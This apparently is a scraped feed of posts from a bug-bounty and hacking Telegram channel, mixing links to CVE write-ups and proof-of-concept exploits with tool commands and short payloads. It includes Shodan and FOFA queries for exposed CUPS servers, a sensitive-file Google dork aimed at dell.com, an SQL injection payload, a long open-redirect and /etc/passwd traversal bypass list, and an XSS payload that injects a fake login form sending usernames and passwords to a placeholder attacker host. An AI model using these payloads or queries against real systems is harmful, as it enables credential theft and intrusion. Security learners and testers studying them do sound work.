2209
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
Exploiting Visual Studio via dump files - CVE-2024-30052
https://ynwarcs.github.io/exploiting-vs-dump-files
If you're into generating subdomains quickly 🚀
check out this website: husseinphp.github.io/subdomain/
CVE-2024-47076/CVE-2024-47175/CVE-2024-47176/CVE-2024-47177: Multiple CUPS flaws enable Linux remote code execution
A remote unauthenticated attacker can silently replace existing printers’ (or install new ones) IPP urls with a malicious one, resulting in arbitrary command execution (on the computer) when a print job is started (from that computer).
PoC: https://github.com/RickdeJager/cupshax
This PoC uses dns-sd printer discovery, so the target must be able to receive the broadcast message, i.e. be on the same network.
CUPS Report and POC leaked online: https://gist.github.com/stong/c8847ef27910ae344a7b5408d9840ee1
Refer: https://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8
Search Query:
HUNTER: header.server="CUPS"
SHODAN: product:"CUPS(IPP)" server: cups
FOFA: server="CUPS"
ZoomEye: app:"CUPS" +title:"CUPS"
Finally working on this and I will be back becoming more and more better guys so that I can help you guys understand things on how it really works...
Читать полностью…
For finding hidden parameter:
arjun -u https://site.com/endpoint.php -oT arjun_output.txt -t 10 --rate-limit 10 --passive -m GET,POST --headers "User-Agent: Mozilla/5.0"
arjun -u https://site.com/endpoint.php -oT arjun_output.txt -m GET,POST -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt -t 10 --rate-limit 10 --headers "User-Agent: Mozilla/5.0"Читать полностью…
Rufus - Create bootable USB drives the easy way
https://rufus.ie/en/
⚡TOP 100 Vulnerabilities Step-by-Step Guide Handbook
https://github.com/Zorono/Learning-PDFs/blob/main/TOP%20100%20Vulnerabilities%20Step-by-Step%20Guide%20Handbook.pdf
try this google dork to find senstive files on website:
site:*.dell.com (ext:doc OR ext:docx OR ext:odt OR ext:pdf OR ext:rtf OR ext:ppt OR ext:pptx OR ext:csv OR ext:xls OR ext:xlsx OR ext:txt OR ext:xml OR ext:json OR ext:zip OR ext:rar OR ext:md OR ext:log OR ext:bak OR ext:conf OR ext:sql)Читать полностью…
☄️Subowner - A Simple python based tool to check for subdomain takeovers in mass scanning. Supports, AWS, Fastly, Shopify, Azure etc.
🚨https://github.com/ifconfig-me/subowner
💠 Introduction to SQL Injection
🔗 https://hacklido.com/blog/910-introduction-to-sql-injection
Top Hacking Books for 2024 (plus Resources): FREE and Paid
Tue, 17 Sep 2024 12:56:36 GMT
https://medium.com/p/394601c01904
Hunting APIs for Bounties: How to Hack and Win Big in Bug Bounties!: rootspaghetti/hunting-apis-for-bounties-how-to-hack-and-win-big-in-bug-bounties-942d0f4e0885?source=rss------bug_bounty-5" rel="nofollow">https://medium.com/@rootspaghetti/hunting-apis-for-bounties-how-to-hack-and-win-big-in-bug-bounties-942d0f4e0885?source=rss------bug_bounty-5
Читать полностью…
a payload to create a phishing page while you get a xss vulnerability, like stored xss or Dom xss '><script>document.write('<h3>Please login to continue</h3><form action=http://YOURIP:PORT/><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();</script><!--
A bypass on GitLab’s Login Email Verification via OAuth ROPC flow.
cybxis/a-bypass-on-gitlabs-login-email-verification-via-oauth-ropc-flow-e194242cad96" rel="nofollow">https://medium.com/@cybxis/a-bypass-on-gitlabs-login-email-verification-via-oauth-ropc-flow-e194242cad96
🔖 Writeup-Miner: Stay Updated with Medium Feeds & Real-Time Alerts for Security Enthusiasts and Tech Researchers!
Writeup-Miner is a 👩💻 Python script that fetches new articles from Medium RSS feeds and stores them in 👩💻 MongoDB or a simple .txt file. Plus, it sends you instant notifications through 📱 Telegram or 📱 Discord!
Key Features:
🟢 Scrape Medium posts via RSS feeds
🟢 Store data in MongoDB or .txt format
🟢 Set custom filters to refine content
🟢 Get a real-time notifications via Telegram or Discord
How to Use:
1. Install the tool:
git clone https://github.com/0xSpidey/writeup-miner.git
cd writeup-miner
pip install -r requirements.txt
2. Configure Telegram or Discord notifications:
python3 writeup-miner.py -t <Telegram Bot Token> -c <Telegram Chat ID> -m mongo
3. Sit back and get notified when new content is published!
👩💻 Example Command (Telegram):
python3 writeup-miner.py -t 123456789:ABCdefGhIJKlmnoPQRstuVWxYZ -c -987654321 -m mongo
🖥 Explore More Options & Usage:
Discover additional commands, filters, and options on our GitHub page👇
📱Github: 🔗Link
#CyberSecurity #WriteupMiner #Automation #MediumRSS #bugbountyTools #bugbounty
🔹 Share & Support Us 🔹
📱 Channel : @bugbounty_tech
Write-Up — Telegram Anonymous Chat Hack Bot: EroHack/write-up-telegram-anonymous-chat-hack-bot-ad3497f813ed?source=rss------bug_bounty-5" rel="nofollow">https://medium.com/@EroHack/write-up-telegram-anonymous-chat-hack-bot-ad3497f813ed?source=rss------bug_bounty-5
Читать полностью…
SQLI Injection
CVE: 2024-36837
Payload: 0-3661)%20OR%20MAKE_SET(8165=8165,7677)%20AND%20(4334=4334
#BugBounty #Tips
Fuzzing from First Principles
https://zerodayengineering.com/research/slides/FuzzingFromFirstPrinciples.pdf
you can try this effective manual openredirect Bypass:
1. Null-byte injection:
- /google.com%00/
- //google.com%00
2. Base64 encoding variations:
- aHR0cDovL2dvb2dsZS5jb20=
- aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ==
- //base64:d3d3Lmdvb2dsZS5jb20=/
3. Case-sensitive variations:
- //GOOGLE.com/
- //GoOgLe.com/
4. Overlong UTF-8 sequences:
- %C0%AE%C0%AE%2F (overlong encoding for ../)
- %C0%AF%C0%AF%2F%2Fgoogle.com
5. Mixed encoding schemes:
- /%68%74%74%70://google.com
- //base64:%32%46%32%46%67%6F%6F%67%6C%65%2E%63%6F%6D
- //base64:%2F%2Fgoogle.com/
6. Alternative domain notations:
- //google.com@127.0.0.1/
- //127.0.0.1.xip.io/
- //0x7F000001/ (hexadecimal IP)
7. Trailing special characters:
- //google.com/#/
- //google.com/;&/
- //google.com/?id=123&//
8. Octal IP address format:
- http://0177.0.0.1/
- http://00177.0000.0000.0001/
9. IP address variants:
- http://3232235777 (decimal notation of an IP)
- http://0xC0A80001 (hex notation of IP)
- http://192.168.1.1/
10. Path traversal with encoding:
- /..%252f..%252f..%252fetc/passwd
- /%252e%252e/%252e%252e/%252e%252e/etc/passwd
- /..%5c..%5c..%5cwindows/system32/cmd.exe
11. Alternate protocol inclusion:
- ftp://google.com/
- javascript:alert(1)//google.com
12. Protocol-relative URLs:
- :////google.com/
- :///google.com/
13. Redirection edge cases:
- //google.com/?q=//bing.com/
- //google.com?q=https://another-site.com/
14. IPv6 notation:
- http://[::1]/
- http://[::ffff:192.168.1.1]/
15. Double URL encoding:
- %252f%252fgoogle.com (encoded twice)
- %255cgoogle.com
16. Combined traversal & encoding:
- /%2E%2E/%2E%2E/etc/passwd
- /%2e%2e%5c%2e%2e/etc/passwd
17. Reverse DNS-based:
- https://google.com.reverselookup.com
- //lookup-reversed.google.com/
18. Non-standard ports:
- http://google.com:81/
- https://google.com:444/
19. Unicode obfuscation in paths:
- /%E2%80%8Egoogle.com/
- /%C2%A0google.com/
20. Query parameters obfuscation:
- //google.com/?q=http://another-site.com/
- //google.com/?redirect=https://google.com/
21. Using @ symbol for userinfo:
- https://admin:password@google.com/
- http://@google.com
22. Combination of userinfo and traversal:
- https://admin:password@google.com/../../etc/passwd
How to Create a Fun, Engaging, and Long-Lasting Bug Bounty Program for Your Community: GrowthKingdom/how-to-create-a-fun-engaging-and-long-lasting-bug-bounty-program-for-your-community-f67da7fb230a?source=rss------bug_bounty-5" rel="nofollow">https://medium.com/@GrowthKingdom/how-to-create-a-fun-engaging-and-long-lasting-bug-bounty-program-for-your-community-f67da7fb230a?source=rss------bug_bounty-5
Читать полностью…
The Hacker Mentality
https://www.youtube.com/watch?v=X2uK5fd0VxA
GitHub - securelayer7/CVE-2024-38856_Scanner: Apache OFBiz RCE Scanner & Exploit (CVE-2024-38856)
https://github.com/securelayer7/CVE-2024-38856_Scanner
Finding Hidden Parameter & Potential XSS with Arjun + KXSS
arjun -q -u target -oT arjun && cat arjun | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | kxss
Читать полностью…
❎ Penetration Testing Roadmap Public: https://github.com/securitycipher/penetration-testing-roadmap
Читать полностью…
Pentesting for Web Applications
https://www.hackerone.com/penetration-testing/web-applications
How I Utilized AI to Discover an Amazon S3 Bucket Takeover Vulnerability in Red Bull’s Bug Bounty…: mohamedsaqibc/how-i-utilized-ai-to-discover-an-amazon-s3-bucket-takeover-vulnerability-in-red-bulls-bug-bounty-503d3c4d995f?source=rss------bug_bounty-5" rel="nofollow">https://medium.com/@mohamedsaqibc/how-i-utilized-ai-to-discover-an-amazon-s3-bucket-takeover-vulnerability-in-red-bulls-bug-bounty-503d3c4d995f?source=rss------bug_bounty-5
Читать полностью…
xss preventing steps from front end.
Input Validation
the web application will not allow us to submit the form if the email format is invalid. This was done with the following JavaScript code:Code: javascriptfunction validateEmail(email) { const re = /^(([^<>()[\]\\.,;:\s@\"]+(\.[^<>()[\]\\.,;:\s@\"]+)*)|(\".+\"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/; return re.test($("#login input[name=email]").val());}
As we can see, this code is testing the email input field and returning true or false whether it matches the Regex validation of an email format.
☄️TplMap - Server-Side Template Injection and Code Injection Detection and Exploitation Tool.
🔗https://github.com/epinna/tplmap
[2,500$ Bug Bounty Write-Up] Remote Code Execution (RCE) via unclaimed Node package
p0lyxena/2-500-bug-bounty-write-up-remote-code-execution-rce-via-unclaimed-node-package-6b9108d10643" rel="nofollow">https://medium.com/@p0lyxena/2-500-bug-bounty-write-up-remote-code-execution-rce-via-unclaimed-node-package-6b9108d10643